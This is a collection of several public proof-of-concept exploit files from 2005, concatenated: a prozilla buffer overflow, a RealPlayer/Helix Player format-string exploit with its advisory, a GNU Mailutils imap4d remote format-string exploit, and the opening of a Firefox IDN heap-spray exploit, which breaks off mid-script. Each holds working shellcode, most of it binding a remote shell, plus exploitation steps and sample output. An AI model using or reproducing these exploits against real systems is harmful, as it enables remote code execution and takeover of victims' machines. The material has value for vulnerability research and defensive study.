#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define OVERFLOW (1<<10)+32
#define SLEDSIZ (1<<10)
#define RETADDR 0x806977a+SLEDSIZ/2
#define OUTPUT "AdvResults.asp"

/*
* prozilla bug, found while auditing for gentoo bug #70090
* -taviso@gentoo.org
*/

/* execve() /bin/id */
unsigned char shellcode[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
"\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
"\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
"\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
"\x9f\xcf\x2d\x8e";

int main(int argc, char **argv)
{
unsigned char *buf;
void *ret = (void *) RETADDR;
FILE *exploit;
int i;

exploit = fopen(OUTPUT, "w");
fprintf(exploit, "<PRE><A HREF=>");

buf = malloc(OVERFLOW);
for (i = 0; buf + i < buf + OVERFLOW; i += sizeof(void *))
memcpy(buf + i, &ret, sizeof(void *));
fwrite(buf, OVERFLOW, 1, exploit);
fprintf(exploit, "</A><A HREF=></A><A HREF=></A></PRE>");
buf = realloc(buf, SLEDSIZ + sizeof(shellcode));
memset(buf, 0x90, SLEDSIZ);
memcpy(buf + SLEDSIZ, shellcode, sizeof(shellcode));
fwrite(buf, SLEDSIZ + sizeof(shellcode), 1, exploit);
free(buf);
fprintf(stderr, "[*] %s created.\n", OUTPUT);
return 0;
}

/*
*****************************************************************************
$ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit
*****************************************************************************
1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
2: Bug Released: September 26th 2005
3: Bug Impact Rate: Hi
4: Bug Scope Rate: Remote
*****************************************************************************
$ This advisory and/or proof of concept code must not be used for commercial gain.
*****************************************************************************

UNIX RealPlayer && Helix Player
http://real.com
http://helixcommunity.org

"The Helix Player is the Helix Community's open source media player for consumers. It is
being developed to have a rich and usable graphical interface and support a variety of open
media formats like Ogg Vorbis, Theora etc.
The RealPlayer for Linux is built on top of the Helix Player for Linux and includes support
for several non-open source components including RealAudio/RealVideo, MP3 etc."

There is a remotly exploitable format string vulnerability in the latest Helix Media Player
suit that will allow an attacker the possibility to execute malicious code on a victims
computer. The exploit code will execute a remote shell under the permissions of the user
running the media player, and effects all versions of RealPlayer and Helix Player.

The bug is exploitable by abusing media, including .rp (relpix)and .rt (realtext) file
formats. Although others may be effected I stick to realpix file format for this advisory.

Almost all media file input is placed on the heap, so it's not possible to just pop our
way to a supplied string like with a normal stack based format bug, as such we can't directly
modify GOT, DTORS, etc. leaving us limited to what we can do.

There are several places where we can control the flow of execution:

popN - call *0x04(eax) - eax is controlled
popN+N - call *0x20(eax) - eax is controlled
popN+NN - call *0x100(edx) - edx is controlled
popN+NNN - ebp - ebp is controlled
popN+NNNN - eip - eip is controlled
....

however since we are limited to the size of the value that can be written, it doesn't seem
possible to point at a known good location directly. Since our shellcode is always mapped via
the .rp file between 0x0822**** - 0x082f**** and with control of one pointer at a time usually,
we can not reach the LSB, we are toast.

In a phrack paper, Riq talks about using sections of the base pointer to create a 4 byte
pointer by chaining EBP like so:

[Frame 10 EBP]--points to-->[Frame 11 EBP]--points to-->[Frame 12 EBP]

And can be manipulated something like so:

-------- -------- --------
Frame 10 Frame 11 Frame 12
-------- -------- --------
1|------------\/
[LSBMSB] [LSBMSB]-- [41414141]
2|____________^ 3|__________^

Well, it doesn't work :-( ..ebp gets moved to esp in frame 11 and it ends with EIP pointing
at 0x00000000.

So what else can I do?

How about use the fact the file being played is under my control and only the MSB needs
overwritten. This solves the problem with the size of the valaue I can write. It is possible to
modify the MSB of an EBP that is reachable, eventually leading to EIP pointing at some good
location after "mov %ebp,%esp" happens, resulting in the execution of our shellcode.

1-> Create a file with shellcode address `printf "\x37\x13\x12\x08"`.rp
2-> Overwrite EBP MSB with the address of the file location on the stack
3-> EBP is moved to ESP
4-> EIP is changed to ESP value
5-> EIP is owned, shell is spawned

Granted this is not a stable method as the user can freely manipulate their environment, and
we use the file name, which is stored in an environment variable to trampoline us to the shellcode.
However my goal here is not to create a worm but a proof-of-concept

The supplied POC should work flawlessly on Debian 3.1, with RealPlayer installed in
/usr/local/RealPlayer and run as shown below.

Sample local run:

Test System: Debian 3.1 against RealPlayer10.0.5.756 Gold

Window 1:
---------
c0ntex@debauch:~$ netstat -an --ip
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 192.168.88.133:22 192.168.88.1:2080 ESTABLISHED
udp 0 0 0.0.0.0:68 0.0.0.0:*
c0ntex@debauch:~$ ./helix4real

Remote format string exploit POC for UNIX RealPlayer && HelixPlayer
Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version
by c0ntex || c0ntexb@gmail.com || http://www.open-security.org

[-] Creating file [VY~Үrp]
[-] Using [148] stack pops
[-] Modifying EBP MSB with value [64105]
[-] Completed creation of test file!
[-] Executing RealPlayer now...
[-] Connecting to shell in 10 seconds
** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **

(realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text()

(realplay.bin:22202): Pango-WARNING **: Invalid UTF-8 string passed to pango_layout_set_text()

ps -ef | tail -12;
...
c0ntex 1631 1624 0 01:10 pts/2 00:00:00 /bin/sh /usr/bin/realplay ./VYF&(?.rp
c0ntex 1636 1631 4 01:10 pts/2 00:00:02 /bin//sh
c0ntex 1637 1636 0 01:10 pts/2 00:00:00 ? ??? ?\ ? ? .rp
c0ntex 1638 1637 0 01:10 pts/2 00:00:00 ? ??? ?\ ? ? .rp
c0ntex 1639 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp
c0ntex 1640 1636 0 01:10 pts/2 00:00:00 /usr/local/RealPlayer/realplay.bin ./VYF&(?.rp
c0ntex 1641 1637 0 01:10 pts/2 00:00:00 ? ??? ?\ ? ? .rp
c0ntex 1642 1637 0 01:10 pts/2 00:00:00 ? ??? ?\ ? ? .rp
c0ntex 1643 1637 0 01:10 pts/2 00:00:00 ? ??? ?\ ? ? .rp
...

To exploit this remotly, a user just needs to place the created file on a web site and provide
a link so users can click the file, launching RealPlayer and exploiting the vulnerability.

Real have been duely informed about this issue and are fixing. Sadly though, it seems someone
is trying to pinch my research, as such I have been forced to release this advisory sooner than
hoped. Until Real get a new release out, do not play untrusted media with RealPlayer or HelixPlayer.
Sorry Real.com!

Moral of the story, don't talk about personal research on IRC. Thank you plagiarizers.

PS: A new RSS feed for the latest 5 Open Security Group Advisories,
@ http://www.open-security.org/adv.xml
is now available.

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"

char filename[]="\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[]="\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
"\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
"\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
"\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
"\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
"\xe1\xcd\x80";


int
filegen(char *shellcode)
{
FILE *rp;

printf("[-] Creating file [%s]\n", filename);

rp = fopen(filename, "w");
if(!rp) {
puts("[!] Could not fopen file!");
free(shellcode);
return(EXIT_FAILURE);
}

printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);

fprintf(rp,
"<imfl>\n"
"<head\n"
"duration=\"1:33.7\"\n"
"timeformat=\"dd:hh:mm:ss.xyz\"\n"
"preroll=\"1:33.7\"\n"
"bitrate=\"1337\"\n"
"width=\"69\"\n"
"height=\"69\"\n"
"aspect=\"\"\n"
"url=\"http://www.open-security.org\"/>\n"
"<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
"<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
"</imfl>", EBPMSB, STACKPOP, shellcode);
fclose(rp);

free(shellcode); shellcode = NULL;

return(EXIT_SUCCESS);
}


int
main(int argc, char **argv)
{
char *shellcode = NULL;

puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

shellcode = (char *)malloc(BUFFER);
if(!shellcode) {
puts("[!] Could not malloc");
return(EXIT_FAILURE);
}

memset(shellcode, NOPS, BUFFER);
memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
shellcode[BUFFER] = '\0';

filegen(shellcode);

puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");

switch(fork()) {
case -1:
puts("[!] Could not fork off, bailing!");
return(EXIT_FAILURE);
case 0:
if(execl(VULN, "realplay", filename, NULL) <0) {
puts("[!] Could not execute realplayer... ");
return(EXIT_FAILURE);
}
}

puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN
ON REALPLAYER WINDOW **");
sleep(10);

if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
puts("[!] Could not connect, check the core file!");
return(EXIT_FAILURE);
}

return(EXIT_SUCCESS);
}

/*
* Copyright © 2005 Rosiello Security
* http://www.rosiello.org
*
* Permission is granted for the redistribution of this software
* electronically. It may not be edited in any way without the express
* written consent of Rosiello Security.
*
* Disclaimer: The author published the information under the condition
* that is not in the intention of the reader to use them in order to bring
* to himself or others a profit or to bring to others damage.
*
* --------------------------------------------------------------------------
*
* GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability
* iDEFENSE Security Advisory 09.09.05
* www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* The GNU mailutils package is a collection of mail-related
* utilities, including local and remote mailbox access services.
* More information is available at the following site:
* http://www.gnu.org/software/mailutils/mailutils.html
*
* This exploit shows the possibility to run arbitrary code
* on FreeBSD machines.
*
* Authors: Johnny Mast and Angelo Rosiello
* e-mails: rave@rosiello.org angelo@rosiello.org
*/

#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>


#define ISIP(m) (!((int)inet_addr(m) ==-1))
#define clean(x) memset(x, 0 , sizeof x)

char code[] =
"\x90\x90\x90\x90"
"\x31\xc0" /* xor %eax,%eax */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\xb0\x7e" /* mov $0x7e,%al */
"\x50" /* push %eax */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */

/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xd2" // xorl %edx,%edx
"\xb0\x61" // movb $0x61,%al
"\x51" // pushl %ecx
"\xb1\x06" // movb $0x6,%cl
"\x51" // pushl %ecx
"\xb1\x01" // movb $0x1,%cl
"\x51" // pushl %ecx
"\xb1\x02" // movb $0x2,%cl
"\x51" // pushl %ecx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\xcd\x80" // int $0x80

/* it binds on port 30464 */
/* bind(fd, (struct sockaddr*)&sin, sizeof(sin)) */
"\xb1\x02" // movb $0x2,%cl
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx

/* port = 0x77, change if needed */
"\x80\xc1\x77" // addb $0x77,%cl
"\x66\x51" // pushw %cx
"\xb5\x02" // movb $0x2,%ch
"\x66\x51" // pushw %cx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb2\x10" // movb $0x10,%dl
"\x52" // pushl %edx
"\x51" // pushl %ecx
"\x50" // pushl %eax
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\x89\xc2" // movl %eax,%edx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x68" // movb $0x68,%al
"\xcd\x80" // int $0x80

/* listen(fd, 1)*/
"\xb3\x01" // movb $0x1,%bl
"\x53" // pushl %ebx
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x6a" // movb $0x6a,%al
"\xcd\x80" // int $0x80

/* cli = accept(fd, 0,0) */
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x51" // pushl %ecx
"\x31\xc9" // xorl %ecx,%ecx
"\xb0\x1e" // movb $0x1e,%al
"\xcd\x80" // int $0x80

/* dup2(cli,0) */
"\x89\xc3" // movl %eax,%ebx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x5a" // movb $0x5a,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 1) */
"\x41" // inc %ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x5a" // movb $0x5a,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 2) */
"\x41" // inc %ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x5a" // movb $0x5a,%al
"\xcd\x80" // int $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */
"\x31\xdb" // xorl %ebx,%ebx
"\x53" // pushl %ebx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x54" // pushl %esp
"\x53" // pushl %ebx
"\x50" // pushl %eax
"\xb0\x3b" // mov $0x3b,%al
"\xcd\x80" // int $0x80

/* exit(..) */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // mobv $0x1,%al
"\xcd\x80"; // int $0x80



void usage( int argc, char **argv )
{

fprintf(stdout, "%s usage:\n\n", argv[0]);
fprintf(stdout, "\t-h host\n");
fprintf(stdout, "\t-p port\n");
fprintf(stdout, "\t-l login\n");
fprintf(stdout, "\t-a password\n\n");

return;
}


void send_message( int fd, char *msg, ... )
{
char string[2000];
int len;
size_t size;

va_list args;


clean(string);


va_start(args, msg);
len = vsnprintf(string, sizeof(string)-1, msg,args);
len = (len >=0) ? len : 0;

/* Terminating the string */
string[len]='\0';

write(fd, string, len);

return;
}





char *buildstring( long r_addr, long target, int offset, int sock )
{
unsigned char string[512], a[4];
int len;
int high, low, arw;


target = 0x806c044; //0xbffffb58;
high = ( target & 0xffff0000 ) >> 16;
low = ( target & 0x0000ffff );

clean(a);
a[0] = (r_addr >> 24) & 0xff;
a[1] = (r_addr >> 16) & 0xff;
a[2] = (r_addr >> 8) & 0xff;
a[3] = (r_addr) & 0xff;
a[4] = '\0';

clean(string);
len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn\n",
(int)a[3]+2,a[2],a[1],a[0],
high -(0x24+13), /* Number of bytes for the first write */
offset /* The Offset to addr */
);

len = (len >=0) ? len : 0;
string[len] = '\0';
write(sock, string, len);

read(sock, string, sizeof(string));


clean(string);
len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn%s\n",
(int) a[3], (int)a[2], (int)a[1],(int)a[0],
low - (0x24 +13),
offset, /* The offset to addr +2 */
code
);

len = (len >=0) ? len : 0;
string[len] = '\0';
write(sock, string, len);


return (char *)strdup(string);
}


void get_addr_as_char( u_int addr, char *buf )
{
*(u_int*)buf = addr;
if (!buf[0]) buf[0]++;
if (!buf[1]) buf[1]++;
if (!buf[2]) buf[2]++;
if (!buf[3]) buf[3]++;
}

static int got_entry = 0x08057a0c+4;//0x0805cb7c; /* GOT of snprintf */


int comun( char *host, struct sockaddr_in sin4 )
{
char *a[4] = { "/usr/bin/telnet", "localhost", "30464", NULL };
execve(a[0],a, NULL);
return 0;
}

void welcome( )
{
fprintf( stdout, "\nCopyright © 2005 Rosiello Security\n" );
fprintf( stdout, "http://www.rosiello.org\n" );
fprintf( stdout, "imap4d Format String Exploiter for FreeBSD\n\n" );
}

int main( int argc, char **argv )
{
struct hostent *hp;
struct sockaddr_in sin4;
char shellbuf[1030];
char *host, buffer[512], *ptr, *p, *USER, *PASS;
int ch, port = 0, sock, offset = 1;
int login = 0, i, calc = 0;
int ret = 0, len = 0, b;
int have_shell_loc = 0;
unsigned int shell_addr = (u_int)0x0806c000;//0xbfbf0101;

welcome( );

if ( argc < 9 )
{
usage(argc, argv);
exit(EXIT_SUCCESS);
}

if (!(host = malloc (128)))
{
fprintf(stderr, "exp.c:115 Could not allocate memory\n");
exit(EXIT_FAILURE);
}


while((ch = getopt(argc, argv, "h:p:l:a:")) != EOF)
{
switch(ch)
{
case 'h':
host = (char *)strdup(optarg);
break;

case 'V':
break;

case 'p':
port = atoi (optarg);
break;

case 'l':
USER = (char *)optarg;

case 'a':
PASS = (char *)optarg;

default:
usage(argc, argv);
break;
}
}



if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
fprintf(stderr, "exp.c:139 Error creating an new socket");
exit(EXIT_FAILURE);
}

host = (host) ? host : "localhost";
port = (port) ? port : 143;

if (!(ISIP(host)))
{
if (!(hp = gethostbyname(host)))
{
fprintf(stderr, "exp.c:152 Could not resolve ip address\n");
exit(EXIT_FAILURE);
}

memcpy(&sin4.sin_addr,hp->h_addr,hp->h_length);
host = (char *)strdup(inet_ntoa(sin4.sin_addr));
}


sin4.sin_family = AF_INET;
sin4.sin_port = (unsigned short)htons( port );

fprintf(stdout, "[+] Connecting to %s:%d\n", host,port);

if ((connect(sock, (struct sockaddr *)&sin4,sizeof(struct sockaddr))) < 0)
{
fprintf(stderr, "[*] exp.c:178 Connection failed\n");
exit(EXIT_FAILURE);
}


fprintf(stdout, "[+] Connected .. \n");
fprintf(stdout, "[+] Sending login ... \n");

send_message(sock, "1 LOGIN %s %s\r\n", USER, PASS);
fprintf(stdout, "[+] Done ... \n");

while ((read(sock, buffer, 512)) > 0)
{
if ( login == 0 && ret == 0)
switch (buffer[0])
{

case '1':
fprintf(stdout, "[+] Selecting inbox ..\n");
send_message(sock, "2 Select inbox\n");
fprintf(stdout, "[+] Selecting Done .. Starting brute sequence\n");
send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset);
login = 1;
break;
}


if ((ptr=strstr(buffer, "(near")) && login == 1)
{
ptr +=15;
if ((strncmp(ptr, "41414141",8))!=0)
{
offset ++;
send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset);
}
else
{
fprintf(stdout, "[+] Found offset %d\n", offset);
fprintf(stdout, "[+] Finding buffer on the stack\n");
ret = 1;
login = 0;
clean(buffer);
}
}

if ( ret == 1 )
{

if ((ptr=strstr(buffer, "(near")))
{
ptr +=6+4 +1; /* +4 for the addr string*/
/* +1 for the junk char */
calc = strlen(buffer) - strlen(ptr);
calc -=6+4+1;

for (i = 0; i < strlen(buffer); i++)
{
if ( (strncmp(ptr, code, strlen(code)))==0 && have_shell_loc !=1)
{
shell_addr += i -4;
have_shell_loc = 1;
buildstring(got_entry, 0x42424242, offset, sock);
fprintf(stdout,"[+] Decoy found at %p\n", shell_addr);
close(sock);
fprintf(stdout, "[+] Trying to contact the bind shell ..\n");
if((comun(host, sin4)) < 0)
fprintf(stderr, "[-] Exploit failed\n");
}
else
++ptr;
}
}
if( shell_addr > 0xc0000000)
break;
shell_addr++;
ptr = ((char *)&shell_addr);
ptr[4] = 0;
if ( strchr(ptr, 0xa) || strchr(ptr, 0xd) || ptr[0]==0x00)
{
shell_addr ++;
ptr = ((char *)&shell_addr);
ptr[4] = 0;
}
while (strlen(ptr) !=4)
{
shell_addr++;
ptr = ((char *)&shell_addr);
ptr[4] = 0;
}
if (have_shell_loc != 1)
{
send_message(sock, "3 search topic .%s....%%%d$s%sCCCC\n",ptr,offset,code);
}
}
clean(buffer);
}

fprintf(stderr, "[+] Closing connection\n");
close(sock);
free(host);

fprintf(stderr, "[-] Exploit failed %p\n", shell_addr);
return 0;
}

<HTML><script>
/*
_______________________________________________________________________

SSSSSSS, SSSSSSS' PwnZilla 5 - One sploit fits all. (FireFox optimized)
iSY iS; .sS* Exploit for IDN host name heap buffer overrun in
.SSSSSSS* .sS* Mozilla browsers (FireFox, Mozilla and Netscape)
iS; .sS* Copyright © 2003-2005 by Berend-Jan Wever.
.SS sSSSSSSP <berendjanwever@gmail.com>
_______________________________________________________________________
Official release: http://www.milw0rm.com/id.php?id=1224

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.

One sploit to rule them all, One sploit to find them,
One sploit to bring them all and to port 28876 bind them.

Credits and thanks:
Tom Ferris/www.security-protocols.com - For finding the vulnerability.
Aviv Raff - Thanks for helping me advance the heap spray technology.
str0ke/www.milw0rm.com - Thanks for testing and hosting the exploit.
HDM/www.metasploit.com - Thanks for the basis of my shellcode.

Technical details:
Since Netscape has not replied to reports about this vulnerability I've
chosen to release it. Since there is no patch out yet, this version does
not target all affected browsers. It is optimized to work with FireFox, who
do have a patch out, but on a rare occasion it will work in Netscape.

This exploits a heap overrun. Rather then trying to beat the security of
modern heap managers, I ignore them and try to overwrite data in the
heap blocks after the block we overrun. It's a game of chance where we
hope the targetted browser will use this overwritten data in a call before
it throws an access violation. We have some control over the odds, more
on that later.

Exploitation is achieved by using the same old heap blocks trick that I've
published about a year ago in my Internet Exploiter exploits. It creates a
string that contains a nopslide and a shellcode. This string is (almost)
exactly large enough to fit into a large heap block. It makes copies
of the string to create more large heap blocks. These heap blocks will fill
all memory between roughly 0x02000000 and 0x28081976. The nopslide consists
of values that can be used as code and pointers; these pointers will all
point to addresses in this same region of memory.
The actually vulnerability is used when it creates a number of image
objects and set their "src" to a url that exploits it to overwrite random
parts of heap memory with a range of addresses that all point to the large
heap blocks.
While it continues to create more and more images, chances are that some
part of FireFox will use the overwritten parts of the heap in a "call" or
"jmp". This will cause our shellcode to get executed.

Previous exploits have all relied on one address being used in the nopslide
and in exploiting the vulnerability to overwrite EIP, that's why you see
0x0D0D0D0D in so many of my exploits and other exploits based on my code.
Because in previous exploits the vulnerable code would just read from this
address and/or call it, this worked pretty well.
This exploit is overwriting random parts of the heap and may therefore
overwrite a number of pointers that may be used in a write operation.
This causes a problem if some part of the code writes to one of our
addresses first and then another part calls it, thereby executing
whatever value the first part overwrote it with as assembly. This may
translate to instructions that cause exceptions, preventing the exploit
from working. To increase our chances of success, we supply it with a
variety of addresses, in an effort to make different parts of the
program use different addresses and hope we end up with executing a
"clean" nopslide.

For Netscape, addresses < 0x10000000 have proven to not work because it
has a tendency to add random blocks to the heap while we're spraying
(for no apparent reason). These somehow always end up exactly where we
don't want them.

*/
var startDate = new Date();
var iFillToAddress = 0x28081976;
var iHeapBlockSize = 0x00200000;
var iHeapHeaderSize = 0x40; // This should work for all browsers/OS-es.
var iHeapStartAddress = 0x00420000;
// The %uXXXX encoding proved hard for a lot of people... damn n00bs!
var sShellcodeBytes = // Make sure the number of bytes is EVEN!
"90 90 90 90 eb 43 56 57 8b 45 3c 8b 54 05 78 01 ea 52 8b 52 20 01 " +
"ea 31 c0 31 c9 41 8b 34 8a 01 ee 31 ff c1 cf 13 ac 01 c7 85 c0 75 " +
"f6 39 df 75 ea 5a 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 " +
"8b 01 e8 5f 5e ff e0 fc 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad 8b " +
"68 08 31 c0 66 b8 6c 6c 50 68 33 32 2e 64 68 77 73 32 5f 54 bb 71 " +
"a7 e8 fe e8 90 ff ff ff 89 ef 89 c5 81 c4 70 fe ff ff 54 31 c0 fe " +
"c4 40 50 bb 22 7d ab 7d e8 75 ff ff ff 31 c0 50 50 50 50 40 50 40 " +
"50 bb a6 55 34 79 e8 61 ff ff ff 89 c6 31 c0 50 50 35 02 01 70 cc " +
"fe cc 50 89 e0 50 6a 10 50 56 bb 81 b4 2c be e8 42 ff ff ff 31 c0 " +
"50 56 bb d3 fa 58 9b e8 34 ff ff ff 58 60 6a 10 54 50 56 bb 47 f3 " +
"56 c6 e8 23 ff ff ff 89 c6 31 db 53 68 2e 63 6d 64 89 e1 41 31 db " +
"56 56 56 53 53 31 c0 fe c4 40 50 53 53 53 53 53 53 53 53 53 53 6a " +
"44 89 e0 53 53 53 53 54 50 53 53 53 43 53 4b 53 53 51 53 87 fd bb " +
"21 d0 05 d0 e8 df fe ff ff 5b 31 c0 48 50 53 bb 43 cb 8d 5f e8 cf " +
"fe ff ff 56 87 ef bb 12 6b 6d d0 e8 c2 fe ff ff 83 c4 5c 61 eb 89 ";
var sShellcode = unescape(
sShellcodeBytes.replace(
// ...I now use regular expressions (thanks, Secunia! )
/\s*([0-9A-Fa-f][0-9A-Fa-f])\s*([0-9A-Fa-f][0-9A-Fa-f])/g,
"%u$2$1"
)
);

// Experimenting with a debugger has let to this string, which uses the max
// hostname length FireFox allows (63 bytes) to create the largest
// overwrite possible. Each of the 0xAD-s gets expanded into two bytes,
// which in theory would allow for a 126 bytes overwrite. But in practise
// FireFox will use 32 of these bytes for other things like the "http://",
// '/', '\0' and some other stuff. This leaves us with 94 bytes and a \0 to
// overwrite heap memory with.
var sURL = unescape(
"http://" +
"%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%
AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD" +
"%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%
AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD" +
"%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%
AD%AD%AD%AD%AD%AD%AD%AD%AD%AD%AD" +
"/" +
// Characters under 0x21 cannot be used, neither can 0x22. This
// is what we overwrite the heap with, so everything needs to be a
// pointer to one of our nopslides.
"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24" +
"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24" +
"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24" +
"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24" +
"%21%21%25%21%23%21%24%25%25%23%25%24%23%23%24%24" +
"%21%21%25%21%23%21%24%25%25%23%25%24%23%23"
);
// Create one nopslide -------------------------------------------------
var sNopslide = "";
var iNopslideSize = iHeapBlockSize - iHeapHeaderSize
- sShellcode.length * 2 - 2; // NULL terminator adds 2
var sAllWorkAndNoPlayMakesJackADullBoy = unescape(
// A list of addresses we hope our browser will use in a call or jmp.
// They should all point to a nopslide, preferably all to a different
// one _and_ be valid "nop" instructions too.
"%u1414%u1415%u141C%u141D%u1514%u1515%u151C%u151D" +
"%u1C14%u1C15%u1C1C%u1C1D%u1D14%u1D15%u1D1C%u1D1D"
);
// (Make sure that ^^^ has a length that is a power of 2 (2, 4, 8 ,16, ...)
// The code below isn't sophisticated enough to handled other lengths.
for (var bit = Math.pow(2, 31); bit > 1; bit /= 2) {
sNopslide += sNopslide + (
iNopslideSize & (bit*sAllWorkAndNoPlayMakesJackADullBoy.length) ?
sAllWorkAndNoPlayMakesJackADullBoy : ""
);
}
// We've only made complete copies of the string, we may need a part of it
// to make it exactly the size we want it to be:
sNopslide = sNopslide + sAllWorkAndNoPlayMakesJackADullBoy.substr(0,
iNopslideSize/2 - sNopslide.length
);
// How many blocks do we need to fill memory up to iHeap_fill_to_address?
var iHeapBlockCount = Math.ceil(
(iFillToAddress - iHeapStartAddress) / iHeapBlockSize
);

// Show copyright message and some stats ----------------------------------
document.write(
"<H2>Pwnzilla</H2>" +
"<B>Copyright © 2003-2005 Berend-Jan \"SkyLined\" Wever.</B><BR>" +
"This program is released under the GNU Public License version 2, " +
"1991 and comes with ABSOLUTELY NO WARRANTY. View source for " +
"details.<HR>" +
"<H2>Multi threaded heap spray 2005</H2>" +
"Assumed heap header size: " + number(iHeapHeaderSize) + " bytes.<BR>"+
"Nopslide size: " + number(sNopslide.length*2) + " bytes.<BR>" +
